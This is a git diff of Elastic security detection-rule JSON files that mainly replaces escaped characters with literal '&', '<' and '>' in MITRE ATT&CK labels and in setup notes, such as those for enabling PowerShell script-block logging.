\"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"Ssms.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json index 8fa670e6553..65a147a4914 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json index da5543dd908..aefa5ce3023 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json index 2f820c1e78c..8fca4744ff1 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json index 827ba9e8ea1..88c4f7721db 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json index fa93949dc80..5fa8857591a 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json index 2a9766cbd7d..b04a1716bea 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json index 27658ffb27f..2331f44dd3a 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json index da69d2c4b4a..3f5c0f47fd5 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json index 5c65ce55bf6..2895420ad2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json index 80880e5e237..b7a709a267e 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json index 7839019ab8d..2a05904c63e 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json index 95bb398d4a7..3f4ecb0cc9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json index 386d2a526d7..2e266d76892 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json index e6fa962f213..5d3f3eab835 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json index 839525d4b66..a8ee335b1f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json index 67ac3c5acb7..28f9bbc68e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json index 75d2d2b0431..6d840527740 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json index b4cbb27e3fe..df55c4ccc65 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json index 6e8183394d4..b98120752c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json index 17f67ae0946..15c14d75988 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json index ee58813e6b4..eb73b939a02 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json index 57864f85ddf..b40cc14967d 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json index 2bca9ba45d9..e9067cbd62b 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json index e7314b5db5d..b1d412bb682 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json @@ -65,7 +65,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json index 327a66ce9ac..33093cdf82d 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json @@ -65,7 +65,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json index 33d7211bd10..d96a1936016 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json index 8b8582f6b8c..ae9ed85cc5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json index f505978cbc1..ad6c1abac00 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json index 4e9794f596e..af76b824ade 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json index 05e18214922..30455707f68 100644 --- a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json +++ b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json index c807dc31751..69b7002b662 100644 --- a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json +++ b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json index d84308622cd..3934ce3dc31 100644 --- a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json index 58b40eb0ecc..0b3af52efe9 100644 --- a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json index 0b19799c98d..cdb781f2923 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json @@ -52,7 +52,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "If enabling an EQL rule on a non-elastic-agent index 